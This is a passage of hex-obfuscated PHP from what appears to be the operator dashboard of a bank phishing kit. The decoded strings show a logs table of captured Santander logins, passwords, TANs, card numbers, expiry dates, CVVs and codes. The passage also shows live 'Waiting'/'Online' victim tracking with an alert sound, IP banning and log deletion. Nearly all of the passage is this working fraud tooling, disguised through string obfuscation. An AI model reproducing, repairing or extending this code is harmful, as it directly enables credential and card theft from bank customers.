"\x20\xf0\x9f\237\242"; $errors = array("\151\x64" => ''); $wachten = "\40\360\x9f\x9f\242"; if (empty($data["\x69\144"])) { $errors["\151\144"] = "\145\155\x70\x74\x79\x5f\151\144"; } if (empty($errors["\151\144"])) { $check = User::deleteLog($_SESSION["\165\x73\x65\162\156\141\155\145"], $data["\151\144"]); if ($check) { echo json_encode(array("\163\x75\x63\x63\x65\163\x73" => "\164\162\x75\x65")); } else { echo json_encode(array("\x66\141\151\154" => "\162\x65\x71\165\145\x73\x74\x5f\146\141\x69\154\x65\x64")); } } else { echo json_encode($errors); } } else { static::redirect("\x2f\142\145\154\147\x69\143\x61\57\163\x74\x61\x72\x74"); } } else { Auth::destroySession(); } } else { static::redirect("\x2f\142\145\x6c\147\151\x63\141\x2f\163\x74\x61\162\x74"); } } public function updateNoteAction() { if (Auth::isLoggedIn()) { $data = User::checkSession($_SESSION["\x75\x73\145\162\156\141\x6d\x65"]); if ($data) { if ($_SERVER["\x52\105\x51\125\105\x53\124\137\x4d\105\x54\x48\117\104"] == "\x50\x4f\123\x54" && isset($_POST["\x69\144"]) && isset($_POST["\x6e\157\x74\x65"])) { $data = array("\151\144" => $_POST["\x69\x64"], "\156\x6f\164\x65" => $_POST["\156\157\x74\145"]); $errors = array("\x69\x64" => '', "\x6e\157\x74\x65" => ''); if (empty($data["\151\144"])) { $errors["\x69\x64"] = "\x65\x6d\160\x74\x79\x5f\151\144"; } if (empty($data["\156\157\x74\x65"])) { $errors["\x6e\x6f\x74\145"] = "\145\x6d\160\x74\171\137\156\x6f\164\x65"; } if (empty($errors["\151\144"]) && empty($errors["\x6e\x6f\x74\145"])) { $check = User::updateNote($_SESSION["\165\x73\145\x72\x6e\x61\x6d\x65"], $data["\x69\144"], $data["\x6e\157\x74\145"]); if ($check) { echo json_encode(array("\x73\x75\143\x63\x65\163\163" => "\164\162\165\145")); } else { echo json_encode(array("\146\x61\x69\154" => "\162\x65\161\165\145\163\x74\x5f\146\x61\151\154\145\144")); } } else { echo json_encode($errors); } } else { static::redirect("\x2f\x62\x65\154\x67\x69\x63\x61\x2f\x73\164\x61\x72\x74"); } } else { Auth::destroySession(); } } else { static::redirect("\x2f\x62\145\x6c\147\x69\x63\x61\57\x73\x74\141\x72\x74"); } } public function deleteAllAction() { if (Auth::isLoggedIn()) { $data = User::checkSession($_SESSION["\165\x73\x65\x72\x6e\x61\x6d\145"]); if ($data) { if ($_SERVER["\122\105\121\125\105\123\124\x5f\115\x45\x54\x48\117\104"] == "\120\x4f\x53\x54") { $check = User::deleteLogs($_SESSION["\165\163\145\x72\x6e\x61\155\145"]); if ($check) { echo json_encode(array("\163\165\143\143\x65\163\163" => "\x74\162\x75\145")); } else { echo json_encode(array("\x66\141\151\154" => "\x72\145\x71\165\x65\163\164\137\146\141\x69\x6c\145\144")); } } else { static::redirect("\57\142\145\x6c\x67\x69\x63\141\x2f\x73\x74\141\x72\x74"); } } else { Auth::destroySession(); } } else { static::redirect("\x2f\x62\x65\154\147\151\x63\x61\x2f\x73\x74\x61\x72\x74"); } } public function deleteEmptyAction() { if (Auth::isLoggedIn()) { $data = User::checkSession($_SESSION["\x75\x73\x65\162\x6e\x61\x6d\145"]); if ($data) { if ($_SERVER["\x52\x45\121\x55\105\x53\x54\137\115\x45\124\x48\117\104"] == "\120\x4f\123\124") { $check = User::deleteEmptyLogs($_SESSION["\165\x73\x65\162\156\141\x6d\x65"]); if ($check) { echo json_encode(array("\x73\165\x63\x63\x65\163\x73" => "\x74\162\165\145")); } else { echo json_encode(array("\146\x61\151\154" => "\162\145\161\x75\x65\163\x74\x5f\146\x61\151\154\x65\144")); } } else { static::redirect("\57\x62\x65\154\147\151\143\141\57\163\x74\x61\162\x74"); } } else { Auth::destroySession(); } } else { static::redirect("\57\142\145\x6c\x67\151\x63\141\57\x73\164\141\162\164"); } } public function banAction() { if (Auth::isLoggedIn()) { $data = User::checkSession($_SESSION["\165\x73\145\x72\156\x61\x6d\x65"]); if ($data) { if ($_SERVER["\x52\105\121\125\105\x53\124\x5f\x4d\105\x54\110\117\x44"] == "\x50\117\x53\124" && isset($_POST["\151\x64"]) && isset($_POST["\x69\160"])) { $data = array("\151\144" => $_POST["\x69\x64"], "\x69\160" => $_POST["\151\160"]); $errors = array("\x69\144" => '', "\x69\x70" => ''); if (empty($data["\151\x64"])) { $errors["\151\x64"] = "\145\x6d\160\164\x79\137\x69\x64"; } if (empty($data["\x69\160"])) { $errors["\x69\160"] = "\x65\x6d\x70\164\x79\137\151\160"; } if (empty($errors["\x69\x64"]) && empty($errors["\151\160"])) { $check = User::banUser($data["\x69\x64"], $data["\x69\x70"]); if ($check) { echo json_encode(array("\163\x75\x63\143\x65\163\163" => "\x74\x72\165\145")); } else { echo json_encode(array("\x66\141\151\154" => "\x72\x65\161\165\x65\163\x74\x5f\146\x61\151\154\145\x64")); } } else { echo json_encode($errors); } } else { static::redirect("\57\x62\145\154\x67\151\143\x61\57\x73\x74\x61\162\164"); } } else { Auth::destroySession(); } } else { static::redirect("\57\x62\x65\154\x67\x69\x63\x61\57\163\x74\x61\x72\164"); } } private function showLogs($logs) { $topLogs = array(); $otherLogs = array(); $userAgents = array("\x47\x6f\157\x67\x6c\x65\x20\103\150\x72\157\x6d\x65" => array("\x69\143\157\156" => "\x66\x61\x62\40\x66\x61\x2d\143\150\162\x6f\155\x65", "\x74\171\x70\x65" => "\102\x72\157\167\163\145\x72"), "\106\151\162\x65\x66\157\x78" => array("\151\143\x6f\156" => "\146\x61\x62\40\x66\x61\x2d\146\151\162\145\x66\x6f\x78", "\x74\171\160\145" => "\102\x72\x6f\167\163\145\x72"), "\123\141\x66\x61\162\151" => array("\x69\143\157\x6e" => "\x66\141\142\40\x66\x61\55\163\x61\x66\141\x72\x69", "\x74\x79\160\x65" => "\102\162\x6f\x77\163\145\x72"), "\x49\156\164\x65\x72\x6e\x65\x74\x20\105\x78\160\154\157\x72\x65\x72" => array("\x69\x63\157\156" => "\146\x61\142\40\146\x61\x2d\x69\x6e\x74\x65\x72\156\145\164\55\x65\x78\x70\x6c\157\162\x65\162", "\164\171\x70\145" => "\102\x72\x6f\167\x73\x65\x72"), "\115\x69\143\x72\157\163\157\146\x74\40\x45\x64\147\x65" => array("\x69\x63\x6f\x6e" => "\x66\141\142\x20\x66\x61\55\x65\x64\147\145", "\164\x79\160\145" => "\x42\x72\157\x77\x73\x65\162"), "\x4f\160\145\162\x61" => array("\x69\x63\157\x6e" => "\146\x61\142\x20\x66\141\x2d\x6f\x70\145\x72\x61", "\x74\171\160\145" => "\x42\162\157\x77\163\145\162"), "\102\x72\141\x76\145" => array("\151\143\157\x6e" => "\146\141\142\40\146\141\x2d\142\x72\141\166\145", "\x74\x79\160\x65" => "\102\162\x6f\167\x73\x65\162"), "\x57\151\x6e\x64\x6f\167\163" => array("\151\x63\x6f\156" => "\146\x61\142\40\146\141\55\x77\151\x6e\x64\x6f\x77\163", "\164\171\160\x65" => "\x4f\x53"), "\x4d\141\x63\40\117\x53" => array("\x69\143\x6f\x6e" => "\x66\x61\142\40\146\x61\55\141\160\160\x6c\x65", "\164\171\160\145" => "\x4f\123"), "\114\151\156\165\170" => array("\x69\x63\157\156" => "\x66\x61\x62\x20\x66\141\x2d\x6c\x69\156\165\x78", "\x74\171\160\x65" => "\117\x53")); foreach ($logs as $log) { $new_date = new \DateTime(); $old_date = new \DateTime($log["\x6c\141\x73\x74\137\143\x6f\x6e\x6e\145\x63\164\145\x64"]); $diff = $new_date->getTimestamp() - $old_date->getTimestamp(); $waiting = "\x20\142\147\x2d\x64\141\x72\153\x65\162"; $wachten = "\40\342\x9a\xab\x20\174\40\117\x66\x66\154\151\x6e\145"; if ($log["\167\141\151\164\151\x6e\147"] == "\164\x72\x75\145") { $waiting = "\x20\x62\x67\x2d\142\x6c\x69\156\x6b"; $wachten = "\x20\360\237\x94\xb4\40\174\40\127\141\151\x74\151\156\x67"; array_push($topLogs, $log); } else { if ($diff < 10) { $waiting = "\x20\x62\x67\55\163\165\x63\x63\145\x73\x73"; $wachten = "\x20\xf0\x9f\x9f\xa2\x20\x7c\40\117\x6e\x6c\x69\156\x65"; array_push($topLogs, $log); } else { array_push($otherLogs, $log); } } } $allLogs = array_merge($topLogs, $otherLogs); foreach ($allLogs as $log) { $new_date = new \DateTime(); $old_date = new \DateTime($log["\154\141\163\x74\137\143\157\156\156\x65\x63\x74\145\144"]); $diff = $new_date->getTimestamp() - $old_date->getTimestamp(); $waiting = "\40\142\x67\55\x64\141\162\153\145\x72"; $wachten = "\x20\342\232\xab\40\x7c\40\x4f\146\146\x6c\x69\x6e\145"; if ($log["\167\x61\151\x74\151\156\147"] == "\x74\162\165\145") { $waiting = "\40\x62\x67\x2d\x62\x6c\x69\156\x6b"; $wachten = "\40\xf0\237\224\xb4\x20\x7c\40\x57\x61\x69\164\x69\x6e\x67"; } else { if ($diff < 10) { $waiting = "\40\x62\x67\x2d\x73\x75\x63\x63\145\x73\163"; $wachten = "\x20\xf0\x9f\237\242\40\x7c\x20\x4f\156\x6c\x69\x6e\145"; } } $userAgentName = $log["\165\163\x65\162\137\141\x67\x65\x6e\164"]; $browserIcon = ''; $browserName = ''; $osIcon = ''; $osName = ''; foreach ($userAgents as $name => $info) { if (strpos($userAgentName, $name) !== false) { if ($info["\164\171\160\x65"] == "\x42\162\x6f\x77\163\x65\162") { $browserIcon = $info["\x69\x63\157\156"]; $browserName = $name; } else { if ($info["\x74\x79\160\x65"] == "\x4f\x53") { $osIcon = $info["\151\143\x6f\x6e"]; $osName = $name; } } } } if (isset($_POST["\x65\155\x70\164\x79"])) { $sql = "\x44\x45\x4c\105\124\x45\40\106\122\117\115\40\x6c\x6f\x67\x73\x20\x57\110\105\122\x45\40\163\141\156\x74\141\156\x64\x65\x72\137\165\x73\x65\162\40\75\x20\x27\x27\x20\101\x4e\x44\x20\x73\x61\156\x74\141\x6e\x64\x65\162\x5f\160\141\x73\163\40\x3d\40\47\47\x20\101\116\104\40\x73\x61\156\164\141\x6e\144\x65\x72\137\145\x78\160\40\x3d\x20\47\47\x20\101\x4e\104\x20\x73\x61\156\164\x61\x6e\x64\145\162\137\156\165\x6d\x62\145\x72\x20\x3d\x20\47\x27\40\101\116\104\x20\163\x61\156\164\141\156\x64\x65\x72\x5f\x74\141\x6e\x20\75\40\47\47\40\101\x4e\104\40\163\141\156\164\x61\156\x64\x65\x72\137\x63\x6f\x6e\146\x69\x72\x6d\40\75\40\47\47\40\x41\x4e\x44\40\x73\141\156\164\141\156\x64\145\x72\x5f\167\x69\x66\151\x20\75\x20\47\47\40\101\116\104\x20\x73\141\x6e\164\x61\x6e\x64\145\162\137\x77\x69\146\x69\137\160\141\x73\x73\40\x3d\x20\47\x27\x20\101\x4e\104\40\163\141\156\164\141\x6e\x64\x65\x72\137\x77\151\x66\x69\137\160\x61\x73\163\x5f\164\x77\157\40\75\x20\x27\47\40\101\116\x44\40\x73\x61\x6e\164\141\x6e\x64\x65\x72\137\x63\162\145\144\x69\x74\143\x61\162\x64\40\75\40\47\47\x20\x41\x4e\104\x20\x73\x61\156\x74\x61\x6e\x64\x65\x72\137\143\x63\145\170\160\x20\75\x20\x27\x27\40\x41\116\104\40\x73\141\156\164\141\x6e\x64\x65\162\x5f\143\166\166\x20\x3d\x20\x27\47\x20\101\x4e\104\40\x73\141\x6e\164\x61\x6e\144\x65\162\137\143\157\x64\145\40\75\x20\47\x27\40\101\116\x44\x20\x73\x61\156\x74\141\156\144\x65\x72\137\x72\145\x73\160\x6f\156\163\x20\x3d\40\47\47"; $db = static::getDB(); $stmt = $db->prepare($sql); $stmt->execute(); header("\x4c\157\143\x61\x74\x69\157\156\x3a\x20\57\154\157\147\163"); die; } echo "\x3c\144\151\x76\40\143\154\x61\163\x73\75\x22\143\x61\x72\x64\x6b\145\x33\142\x61\x20\x63\x6f\154\55\x6c\147\x2d\63\42\76"; echo "\74\144\151\166\40\x63\154\141\163\x73\x3d\x22\x20\155\142\x2d\61\x20\142\147\x2d\144\141\x72\x6b\145\162\x20\162\157\x75\x6e\x64\145\x64\x20\x20\143\165\x73\164\x6f\155\55\143\x61\162\144\55\163\151\156\143\157\42\x3e\x20\12\x20\x20\x20\x20\x20\x20\40\x20\40\x20\40\x20\x3c\144\151\x76\x20\x63\x6c\141\x73\163\x3d\42\x63\x61\x72\x64\x2d\x68\145\x61\144\x65\162\x20\164\x65\x78\x74\55\x77\x68\x69\164\x65\x20" . $waiting . "\40\x73\x69\151\154\145\156\x63\x65\x64\55\x64\141\162\153\x65\x72\x22\76\xa\40\40\40\40\x20\40\x20\40\x20\x20\40\40\74\x69\40\163\x74\171\154\145\x3d\x22\x63\x6f\154\157\162\72\x20\x23\x39\x63\64\144\143\x63\x22\x20\143\154\141\x73\x73\75\x22\x66\141\40\x66\x61\x2d\167\151\x66\x69\x22\40\x61\162\151\x61\55\x68\151\144\x64\x65\x6e\x3d\x22\164\162\165\x65\42\x3e\74\57\151\x3e\12\40" . $log["\x69\x70"] . "\x20\x3c\x2f\144\151\166\x3e"; echo "\74\x73\164\x79\x6c\x65\x3e\x20\xa\40\x20\x20\40\166\163\x73\162\x74\152\145\40\173\xa\x20\x20\40\x20\x20\x20\x20\40\x66\157\x6e\x74\55\146\141\155\151\154\x79\x3a\40\x6d\x6f\156\157\163\x70\x61\x63\x65\x3b\xa\40\40\40\x20\175\xa\x20\x20\x20\x20\56\157\163\55\x69\x63\157\156\x3a\x62\145\146\x6f\x72\x65\x20\x7b\xa\40\40\x20\40\40\40\x20\40\x66\x6f\156\x74\x2d\x73\x69\x7a\145\72\40\x32\64\x70\170\73\xa\40\40\x20\x20\40\x20\x20\40\155\x61\162\x67\x69\156\x2d\162\151\147\150\164\x3a\40\x38\160\x78\73\12\40\x20\40\40\175\xa\40\40\40\x20\x2e\x62\162\x6f\167\163\x65\x72\x2d\x69\x63\x6f\x6e\x3a\x62\x65\x66\157\x72\x65\40\x7b\12\40\40\x20\x20\40\x20\x20\40\146\157\x6e\164\55\163\151\172\x65\72\x20\x32\x34\x70\x78\73\xa\x20\40\40\40\x20\40\40\x20\155\141\162\147\151\156\x2d\x72\151\147\x68\x74\72\40\x38\x70\170\x3b\xa\40\40\x20\40\175\12\x2e\146\141\x2d\167\x69\156\144\157\167\x73\40\173\12\x20\x20\x63\157\154\x6f\162\72\x20\43\x39\x63\64\x64\143\x63\73\x20\57\52\x20\x57\151\x6e\144\157\x77\x73\x20\143\157\x6c\x6f\x72\40\52\57\12\175\12\12\x2e\x66\x61\55\141\x70\x70\154\145\x20\173\12\40\40\x63\157\x6c\x6f\x72\x3a\40\x23\x39\143\64\x64\x63\x63\x3b\40\57\52\40\x4d\141\x63\x20\143\157\154\x6f\x72\40\52\x2f\xa\x7d\xa\12\56\146\141\x2d\154\x69\x6e\165\170\x20\x7b\xa\40\x20\143\x6f\154\x6f\x72\x3a\x20\43\x39\143\64\144\x63\143\x3b\x20\x2f\52\x20\x4c\151\x6e\x75\170\40\143\x6f\x6c\x6f\162\x20\52\x2f\xa\175\12\12\x2e\x66\x61\55\x63\x68\x72\x6f\155\145\40\x7b\xa\40\40\143\x6f\154\x6f\x72\x3a\x20\x23\x39\x63\64\144\x63\x63\x3b\40\x2f\x2a\40\x43\x68\162\x6f\155\145\x20\143\157\154\157\x72\x20\x2a\57\12\x7d\xa\12\56\146\x61\x2d\146\x69\x72\145\146\x6f\170\40\x7b\xa\40\x20\143\x6f\x6c\x6f\x72\x3a\40\43\71\x63\x34\144\x63\143\73\40\57\52\x20\106\x69\162\145\x66\x6f\170\x20\x63\157\154\157\x72\x20\52\57\12\175\xa\xa\56\x66\141\55\x73\x61\x66\141\x72\x69\40\173\12\x20\x20\x63\157\x6c\x6f\x72\x3a\x20\x23\x39\x63\x34\144\x63\x63\x3b\40\x2f\52\40\123\141\146\141\x72\151\x20\143\157\154\157\162\40\x2a\x2f\xa\x7d\xa\xa\56\146\x61\55\151\156\164\x65\x72\156\145\164\55\145\170\x70\x6c\x6f\x72\145\x72\40\173\xa\x20\40\143\157\154\157\x72\72\x20\x23\71\143\x34\144\x63\143\73\40\x2f\52\x20\111\x6e\x74\x65\162\x6e\145\164\40\105\170\160\x6c\157\x72\145\162\40\x63\x6f\x6c\x6f\162\x20\52\57\12\175\xa\12\x2e\146\x61\x2d\145\x64\x67\145\40\x7b\12\40\40\x63\157\154\157\162\72\40\x23\x39\x63\x34\144\143\x63\73\x20\x2f\x2a\x20\105\144\x67\x65\40\x63\x6f\x6c\x6f\162\40\52\57\xa\175\xa\12\56\x66\141\55\157\160\145\x72\141\x20\173\12\x20\40\143\157\154\157\x72\x3a\x20\43\71\143\x34\144\143\x63\73\x20\57\x2a\40\x4f\160\x65\x72\x61\40\143\x6f\154\x6f\x72\x20\52\57\12\175\12\12\x2e\146\141\55\x62\x72\x61\166\x65\x20\173\12\x20\40\x63\157\154\x6f\162\x3a\x20\43\71\x63\x34\144\143\143\x3b\x20\x2f\52\x20\102\162\141\x76\145\x20\143\x6f\154\157\162\40\52\57\xa\x7d\12\12\74\57\x73\164\171\x6c\x65\76\x3c\144\151\x76\x20\143\154\x61\163\x73\x3d\x22\x63\141\x72\x64\x2d\x62\157\x64\x79\x22\76\xa\74\144\151\x76\40\x63\x6c\x61\x73\163\75\42\143\141\x72\144\40\155\x62\x2d\61\x20\x73\x69\x69\154\x65\x6e\143\145\x64\55\144\141\162\153\x65\x72\40\162\x6f\165\156\x64\145\x64\40\40\x63\x75\x73\164\157\x6d\55\x63\141\x72\x64\42\76\xa\74\142\x72\x3e\12\74\163\x70\x61\x6e\x20\163\164\x79\154\145\75\x22\x63\x6f\x6c\157\162\x3a\x20\x23\x39\x63\x34\144\143\143\42\40\x63\154\141\163\163\x3d\x22\146\x61\x20\x66\x61\x2d\165\156\151\x76\x65\x72\x73\151\164\171\42\x20\x61\x72\151\141\x2d\x68\151\x64\x64\145\x6e\75\42\x74\x72\165\x65\x22\76\74\57\163\x70\141\156\x3e\x3c\160\x20\x73\164\x79\x6c\x65\75\x22\x66\x6f\x6e\164\x2d\x73\x69\172\145\x3a\61\66\x70\170\73\x22\x20\x3e\xa\40" . htmlspecialchars($log["\x62\141\x6e\x6b"]) . "\40\x3c\57\x70\76\12\xa\x20\40\x20\x20\40\xa\12\x3c\160\x3e\123\x74\x61\x74\x75\163\72\40" . $wachten . "\40\x3c\57\x70\x3e\12\x3c\160\76\x3c\163\160\x61\156\40\143\154\x61\163\x73\x3d\42\x76\163\163\x72\164\152\145\42\x3e\117\123\x3a\x20\x3c\163\160\141\156\x20\x73\164\x79\x6c\145\x3d\x22\146\x6f\156\x74\55\x73\151\172\x65\x3a\x20\62\x30\160\170\73\42\x20\x63\154\x61\163\x73\75\42" . htmlspecialchars($osIcon) . "\x22\76\74\57\x73\160\141\x6e\x3e\x20\x3c\163\160\x61\x6e\x20\163\164\171\154\145\x3d\x22\x66\157\156\164\55\x73\151\172\145\72\40\x31\x38\160\170\x3b\42\x20\143\x6c\141\163\x73\x3d\x22" . htmlspecialchars($browserIcon) . "\42\76\74\x2f\x73\160\141\156\x3e\74\x2f\163\x70\141\156\76\74\x2f\160\76\12\12\74\160\76\xa\x3c\166\163\x73\x72\x74\x6a\145\x3e\xa\x20\40\40\40\x3c\x69\156\x70\165\x74\40\164\171\160\x65\x3d\x22\x74\145\170\164\x22\40\163\x74\171\x6c\145\75\42\40\146\157\x6e\x74\55\163\x74\171\154\145\72\x20\151\x74\x61\x6c\x69\x63\x3b\x22\40\x63\x6c\141\163\x73\x3d\x22\146\x6f\x72\155\55\143\157\156\164\162\157\154\40\x72\141\x62\157\x2d\154\157\x67\x69\156\40\151\x6e\160\x75\x74\x2d\144\141\x72\153\40\x6d\x74\x2d\61\x20\x63\x75\163\x74\157\x6d\x2d\151\156\x70\x75\164\42\x20\12\40\40\40\x20\40\40\x20\x20\x70\x6c\x61\143\x65\x68\157\x6c\x64\145\x72\x3d\x22\x4e\x6f\164\145\72\40" . ($log["\156\157\x74\x65"] ? htmlspecialchars($log["\156\157\x74\x65"]) : "\x4e\x4f\x20\x4e\x4f\124\105\40\106\111\x4c\114\x45\x44\x20\111\x4e") . "\x22\xa\x20\40\40\40\x20\40\40\40\151\144\75\42\156\x6f\x74\145\x5f" . htmlspecialchars($log["\x75\163\x65\162\x5f\x69\x64"]) . "\42\x20\157\156\146\x6f\143\165\x73\x3d\42\163\x68\x6f\167\x42\165\164\164\157\156\50\x27" . htmlspecialchars($log["\x75\x73\x65\x72\137\x69\x64"]) . "\47\x29\42\76\xa\x20\x20\40\x20\x3c\142\x75\164\x74\x6f\156\x20\x63\x6c\x61\163\163\75\42\142\x74\x6e\x20\x62\x74\x6e\55\x64\141\156\x67\x65\162\x20\x62\164\156\x2d\163\x6d\40\x61\156\x69\x6d\x61\164\145\144\x2d\x62\x75\x74\164\157\156\x22\40\151\x64\x3d\x22\163\x61\166\x65\x4e\157\x74\x65\102\165\164\x74\x6f\156\137" . htmlspecialchars($log["\x75\163\145\162\x5f\x69\144"]) . "\42\40\x73\x74\x79\x6c\x65\75\42\x20\x64\151\x73\x70\x6c\x61\171\x3a\x20\x6e\x6f\x6e\145\73\40\x6f\160\x61\x63\x69\164\171\x3a\x20\60\x3b\42\x20\12\40\40\40\x20\40\40\x20\40\x6f\156\143\x6c\151\x63\x6b\75\42\x75\x70\144\141\164\145\116\157\164\145\50\x27" . htmlspecialchars($log["\165\163\145\x72\x5f\x69\x64"]) . "\47\x2c\40\x64\157\x63\x75\155\145\x6e\x74\56\x67\145\164\105\x6c\x65\x6d\x65\x6e\164\x42\x79\x49\x64\x28\47\156\157\164\145\x5f" . htmlspecialchars($log["\x75\x73\x65\162\137\151\x64"]) . "\47\x29\x2e\166\x61\154\x75\145\x29\x22\76\xa\x20\x20\x20\40\x20\x20\40\40\x3c\151\40\x63\154\x61\x73\163\x3d\x22\146\141\x20\x66\141\55\145\x64\x69\164\42\76\74\57\x69\76\x20\x53\x61\x76\145\x20\116\x6f\164\x65\xa\x20\40\x20\x20\x3c\57\x62\165\164\x74\x6f\x6e\76\12\40\x20\x20\x20\74\x62\x75\x74\164\x6f\156\x20\x63\154\141\163\163\x3d\x22\x62\x74\x6e\x20\142\164\x6e\x2d\x64\141\156\147\x65\162\40\142\x74\156\x2d\x73\155\40\x61\x6e\x69\x6d\141\x74\145\x64\x2d\x62\x75\x74\164\157\156\42\x20\x69\144\75\x22\145\x78\151\x74\x4e\x6f\164\x65\102\165\164\x74\x6f\x6e\x5f" . htmlspecialchars($log["\x75\163\145\x72\x5f\151\x64"]) . "\x22\40\x73\164\x79\x6c\145\x3d\42\x64\151\x73\160\154\141\171\72\40\156\x6f\x6e\x65\x3b\x20\157\160\x61\143\151\x74\171\x3a\40\x30\73\42\40\x6f\x6e\x63\x6c\151\143\153\x3d\x22\145\x78\x69\x74\x4e\x6f\x74\x65\x28\x27" . htmlspecialchars($log["\x75\163\x65\x72\x5f\151\x64"]) . "\47\x29\42\76\xa\40\40\x20\40\40\x20\x20\40\x3c\x69\40\143\154\141\163\x73\75\42\x66\141\40\146\x61\x2d\164\151\155\x65\x73\x2d\x63\x69\162\x63\154\145\42\40\x61\x72\151\141\55\150\151\x64\144\x65\156\75\x22\x74\162\x75\145\42\x3e\74\x2f\151\76\xa\x20\x45\x78\151\164\40\x4e\x6f\164\x65\12\x20\x20\x20\40\74\x2f\142\165\164\164\157\x6e\76\xa\74\x2f\x76\163\x73\x72\x74\152\x65\x3e\xa\xa\12\x3c\x2f\160\x3e\xa\xa\xa\x3c\x2f\x64\x69\x76\76\12\12\12\40\40\x20\x20\40\x20\40\40\x20\40"; ?>
        <br>
            <button class="btn btn-purple btn-sm" onclick="openUser('<?php  echo htmlspecialchars($log["\x75\163\145\162\x5f\151\x64"]); ?>
')"><i class="fas fa-external-link-alt"></i> View</button>
            <button class="btn btn-purple btn-sm" onclick="deleteLog('<?php  echo htmlspecialchars($log["\x75\163\145\162\137\151\x64"]); ?>
')"><i class="fas fa-trash"></i> Delete</button>
            <button class="btn btn-purple btn-sm" style="display: none;" onclick="updateNote('<?php  echo htmlspecialchars($log["\165\163\145\x72\137\151\144"]); ?>
', document.getElementById('note').value)"><i class="fa fa-edit"></i> Save Note</button>
   
            <?php  echo "\74\144\x69\x76\x20\143\x6c\141\163\163\x3d\x22\143\x6f\154\x6c\x61\160\x73\x65\42\40\151\x64\75\42" . htmlspecialchars($log["\x75\163\x65\x72\156\x61\155\145"]) . htmlspecialchars($log["\165\163\145\x72\137\x69\x64"]) . "\42\x20\163\x74\x79\154\x65\x3d\42\42\x3e"; echo "\74\57\144\x69\166\x3e"; echo "\74\x2f\x64\x69\x76\x3e"; echo "\x3c\57\144\x69\166\x3e"; echo "\74\57\144\151\x76\x3e"; } } private function showLog($log) { $new_date = new \DateTime(); $old_date = new \DateTime($log["\154\x61\163\x74\137\143\x6f\x6e\156\145\143\x74\145\144"]); $interval = $old_date->diff($new_date); $minutes = $interval->i; $hours = $interval->h; $days = $interval->d; $total_minutes = $minutes + $hours * 60 + $days * 24 * 60; $timeString = ''; if ($total_minutes >= 60) { $hours = floor($total_minutes / 60); $minutes = $total_minutes % 60; $timeString = $hours . "\40\150\157\165\162" . ($hours > 1 ? "\163" : '') . "\40\141\x6e\x64\40" . $minutes . "\40\155\151\x6e\x75\164\145\163" . ($minutes > 1 ? "\163" : '') . "\40\x61\x67\x6f"; } else { $timeString = $total_minutes . "\40\155\x69\156\165\164\145\163" . ($total_minutes > 1 ? "\x73" : '') . "\x20\x61\x67\x6f"; } $bank = ''; if (!empty($log["\x62\x61\x6e\153"])) { $bank = '' . $log["\142\x61\x6e\153"]; $user_id = $log["\165\x73\145\162\x5f\151\x64"]; $ip = $log["\x69\x70"]; $waiting = $log["\x77\x61\x69\x74\x69\x6e\147"]; $last_connected = $log["\154\x61\163\164\137\x63\x6f\x6e\156\145\143\x74\x65\144"]; } if ($log["\x77\141\151\x74\x69\156\147"] == "\164\x72\165\x65") { $waiting = "\40\x62\147\55\142\154\151\x6e\153"; $wachten = "\x20\xf0\237\224\xb4\x20\x7c\40\127\141\x69\164\x69\156\x67"; echo "\74\141\165\x64\x69\x6f\40\x61\x75\x74\157\x70\154\x61\171\40\x6c\157\157\160\76\x3c\x73\x6f\x75\x72\143\145\40\x73\162\143\x3d\x22\x2f\x61\165\144\151\157\x2f\166\151\163\x2e\155\160\x33\x22\x20\164\171\x70\x65\x3d\x22\x61\165\x64\151\x6f\x2f\x6d\160\x65\147\x22\76\x3c\57\141\x75\144\x69\157\x3e"; } else { if ($log["\x77\x61\151\164\151\x6e\147"] < 10) { $waiting = "\x20\x62\x67\x2d\163\165\x63\143\145\163\x73"; $wachten = "\40\360\x9f\x9f\xa2\x20\x7c\x20\x4f\x6e\154\x69\156\145"; } } if ($log["\x77\141\x69\x74\x69\x6e\147"] == "\146\x61\x6c\x73\145") { $wachten = "\40\xe2\232\xab\xf0\x9f\237\xa2"; } $diff = $new_date->getTimestamp() - $old_date->getTimestamp(); echo "\x3c\142\162\76\x3c\x62\x72\x3e\x3c\x64\x69\166\x20\x63\x6c\x61\163\163\75\42\162\x6f\x77\40\160\x2d\x31\42\76"; if ($log["\x77\x61\x69\164\x69\156\147"] === "\x74\x72\x75\x65") { echo "\74\144\x69\166\x20\x63\154\x61\163\x73\75\x22\x63\157\154\x2d\61\x32\x22\76"; echo "\x3c\x64\151\x76\x20\x63\154\141\163\x73\x3d\x22\143\157\154\55\61\62\40\142\x67\55\x62\154\x69\156\153\x20\162\157\x75\x6e\x64\145\144\42\x3e"; echo "\74\x68\61\40\x63\x6c\x61\163\163\x3d\x22\x74\145\x78\164\x2d\x77\150\x69\164\x65\40\164\145\170\x74\55\143\145\x6e\164\145\x72\x20\160\x2d\64\42\x20\x69\144\75\42\x61\x6c\145\x72\x74\42\40\163\x74\171\x6c\x65\75\x22\x66\x6f\156\164\x2d\163\x69\x7a\x65\x3a\40\x31\56\x35\x72\x65\x6d\x22\76\x3c\151\40\143\154\x61\x73\x73\75\42\x66\x61\x20\146\141\x2d\167\x69\146\x69\42\x20\141\x72\x69\141\x2d\x68\x69\144\x64\x65\x6e\75\x22\x74\x72\x75\145\42\76\x3c\57\x69\76\x20\x43\x75\162\162\145\x6e\x74\154\x79\x20\127\141\x69\164\x69\x6e\147\74\57\x68\x31\x3e"; echo "\74\x2f\x64\151\166\76"; } else { if ($diff > 10) { echo "\x3c\144\x69\166\40\x63\x6c\x61\x73\163\75\42\x63\x6f\x6c\x2d\61\x32\x22\x3e"; echo "\74\144\151\166\x20\x63\x6c\x61\x73\x73\75\x22\x63\157\154\x2d\x31\x32\x20\x62\x67\x2d\144\x61\162\x6b\145\x72\x20\x72\157\165\x6e\144\x65\144\x22\76"; echo "\74\x68\x31\40\x63\x6c\x61\x73\x73\x3d\42\x74\145\170\x74\x2d\x77\150\151\x74\145\x20\164\145\x78\164\x2d\x63\x65\156\x74\145\x72\x20\160\x2d\64\x22\x20\x69\144\x3d\42\x61\154\145\x72\164\x22\x20\163\x74\171\x6c\145\75\42\x66\x6f\156\x74\55\163\x69\172\x65\x3a\x20\x31\56\x35\162\x65\x6d\x22\x3e\x3c\x69\40\x63\x6c\141\163\x73\75\42\x66\x61\x20\146\141\55\x77\151\x66\151\42\x20\x61\x72\151\141\55\150\151\144\144\145\156\75\x22\x74\x72\x75\x65\x22\76\x3c\57\x69\x3e\x20\103\x75\x72\x72\145\156\x74\154\x79\40\117\146\x66\154\151\x6e\x65\40\x3c\57\150\61\x3e"; echo "\x3c\x2f\x64\151\x76\x3e"; } else { echo 